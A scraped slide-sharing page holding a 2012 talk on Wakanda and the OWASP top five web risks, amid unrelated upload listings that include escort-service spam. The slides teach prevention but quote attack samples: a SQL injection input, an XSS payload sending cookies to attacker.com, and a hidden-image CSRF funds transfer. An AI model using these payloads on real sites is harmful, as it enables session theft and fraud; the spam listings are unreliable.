Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 

Recently uploaded (20)

CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 

Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe

  • 1. Wakanda and the Top 5 Security Risks by Alexandre Morgaut
  • 2. Presentation • Wakanda Community manager • W3C AC member • Web Architect • JS Expert, REST Lover, NoSQL Fanboy • W3C “jseverywhere“ community group @amorgaut
  • 3. Agenda • The Open Web Application Security Project • Top 10 Application Security Risks • Zoom on Top 5 • A1 - Injection • A2 - Cross-Site Scripting (XSS) • A3 - Broken Authentication & Session Management • A4 - Insecure Direct Object Reference • A5 - Cross Site Request Forgery (CSRF)
  • 4. OWASP • The Open Web Application Security Project • started in 2001 by Mark Curphey and Dennis Groves • includes corporations, educational organizations, and individuals • Cheat Sheets, Training, Books • AppSec Conferences • TOP 10 Security Risks https://www.owasp.org
  • 5. Top 10 Risks • A1 - Injection • A2 - Cross-Site Scripting (XSS) • A3 - Broken Authentication & Session Management • A4 - Insecure Direct Object Reference • A5 - Cross Site Request Forgery (CSRF) • A6 - Security Misconfiguration • A7 - Insecure Cryptographic Storage • A8 - Failure to Restrict URL Access • A9 - Insufficient Transport Layer Protection • A10 - Unvalidated Redirects and Forwards
  • 6. Injection • Attacks • SQL Injections, JS injections • deferred Injections
  • 7. SQL Injection query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") +"'"; http://example.com/app/accountView?id=' or '1'='1
  • 8. Injection • Attacks • SQL Injections, JS injections • deferred Injections • Preventions • Input check, query parameters • Eval is Evil • new Function() == deferred eval() • no dynamically created JS query expression
  • 9. Wakanda Security • NoSQL • Query parameters • User Access Right at the Database level • CRUD + execution Access Rights • Restricting queries • onRestrictingQuery handler
  • 10. Cross-Site Scripting (XSS) • Attacks • stored, reflected, DOM based • JS injection in the UI
  • 12. XSS Attack page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'>";
  • 13. XSS Attack page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'>"; http://example.com/?CC='><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>'.
  • 14. Cross-Site Scripting (XSS) • Attacks • stored, reflected, DOM based • JS injection in the UI • Prevention • validate any input • escape output
  • 15. Wakanda Security • Static HTML files • Data inclusion based on datasources • output escaped by default • Beware • WYSIWYG widget + on Row Draw • deferred effect
  • 16. Broken Authentication & Session Management • Attacks • session fixation in URL or Form • session hijacking
  • 17. Broken Authentication & Session Management http://example.com/sale/saleitems;jsessionid= 2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii
  • 18. Broken Authentication & Session Management • Attacks • session fixation in URL or Form • session hijacking • Prevention • check session owner • session in HTTP only cookie • reasonable timeout
  • 19. Wakanda Security • Session IDs managed automatically • HTTP only restriction • No session ID in URL or Form • Check of user session owner • Check of user-agent session owner
  • 20. Insecure Direct Object Reference • Attacks • changed accessed resource URL
  • 22. Insecure Direct Object Reference query = "SELECT * FROM accts WHERE account = ?"; pstmt = connection.prepareStatement(query , ... ); pstmt.setString( 1, request.getparameter("acct")); results = pstmt.executeQuery( );
  • 23. Insecure Direct Object Reference query = "SELECT * FROM accts WHERE account = ?"; pstmt = connection.prepareStatement(query , ... ); pstmt.setString( 1, request.getparameter("acct")); results = pstmt.executeQuery( ); http://example.com/app/accountInfo?acct=notmyacct
  • 24. Insecure Direct Object Reference • Attacks • changed accessed resource URL • Prevention • Indirect resource reference • Check all resource access rights
  • 25. Wakanda Security • Access always checked by the REST API • User Authenticated at database level • Restricting Queries • Extended DataClass • Current User or Current Group check
  • 26. Cross-Site Request Forgery (CSRF) • Attacks • HTTP request unintentionally sent
  • 28. Cross-Site Request Forgery (CSRF) Transfert API
  • 29. Cross-Site Request Forgery (CSRF) Transfert API http://app.com/transferFunds?amount=1500 &destAccount=4673243243
  • 30. Cross-Site Request Forgery (CSRF) Transfert API http://app.com/transferFunds?amount=1500 &destAccount=4673243243 Give a Picture URL
  • 31. Cross-Site Request Forgery (CSRF) Transfert API http://app.com/transferFunds?amount=1500 &destAccount=4673243243 Give a Picture URL <img src="http://app.com/transferFunds?amount=1500&destAccount=AttackerAccount#“ width="0" height="0">
  • 32. Cross-Site Request Forgery (CSRF) • Attacks • HTTP request unintentionally sent • Prevention • validate any input • use URL manipulations APIs • escape output • use Tokens in forms
  • 33. TOP 10 Risks https://www.owasp.org/index.php/Top_10_2010-Main https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project